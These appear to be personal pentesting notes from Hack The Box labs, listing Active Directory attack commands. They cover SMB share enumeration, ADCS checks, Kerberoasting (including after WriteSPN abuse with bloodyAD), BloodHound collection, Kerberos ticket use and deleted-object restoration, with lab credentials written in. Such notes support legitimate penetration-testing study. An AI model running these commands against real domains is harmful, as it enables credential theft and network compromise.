nxc
- Get SMB shares :
nxc smb <target domain name> -u <username> -p <password> --shares - Checking for certificates:
nxc ldap DC -u levi.james -p 'KingofAkron2025!' -M adcs - Kerberoasting:
nxc ldap DC -u levi.james -p 'KingofAkron2025!' --kerberoasting kerb.txt - bloodhound-ce-python:
bloodhound-ce-python --zip -dc DC.puppy.htb -u levi.james -p 'KingofAkron2025!' --auth-method ntlm -c all -d puppy.htb --dns-tcp -ns 10.10.11.70 - rusthound-ce :
rusthound-ce -d DC.puppy.htb -u 'levi.james@puppy.htb' -p 'KingofAkron2025!' -z
Kerberos Stuff
- Generate
krb5file:nxc -k 10.10.11.69 -u "j.fleischman" -p "J0elTHEM4n1990!" --generate-krb5-file fluffy.krb5 - Then put it into
/etc/krb5.confand thengetTGT:getTGT.py fluffy.htb/j.fleischman:J0elTHEM4n1990! - And use
KRB5CCNAMEto login via SSH -kerberos:KRB5CCNAME=f.frizzle.ccache ssh -K f.frizzle@frizzdc.frizz.htb -v
smbclient (or impacket smbclient.py)
I usually use smbclient and that is what IppSec uses and I learnt from there.
smbclient //10.10.11.51/Accounting\ Department -U rose%KxEPkKe6R8su- smbclient with kerberos:
smbclient --realm=voleur.htb //dc.voleur.htb/IT -U "voleur.htb/ryan.naylor%HollowOct31Nyt" -k
WriteSPN
Source: BloodHound wiki: https://bloodhound.specterops.io/resources/edges/write-spn
- First set the “ServicePrincipalName”:
bloodyAD -d tombwatcher.htb -u henry -p H3nry_987TGV! --host 10.10.11.72 set object alfred servicePrincipalName -v "http/somethingafterhttp" - Then use
nxcforkerberoasting:nxc ldap dc01.tombwatcher.htb -u henry -p H3nry_987TGV! -k --kerberoasting kerberoasting.hashes - Crack the hash using
hashcat.
Get/Restore Deleted Users
- Get Deleted object:
Get-ADObject -filter 'isDeleted -eq $true' -IncludeDeletedObjects - Get the GUID from above and restore it as:
Restore-ADObject -identity <GUID>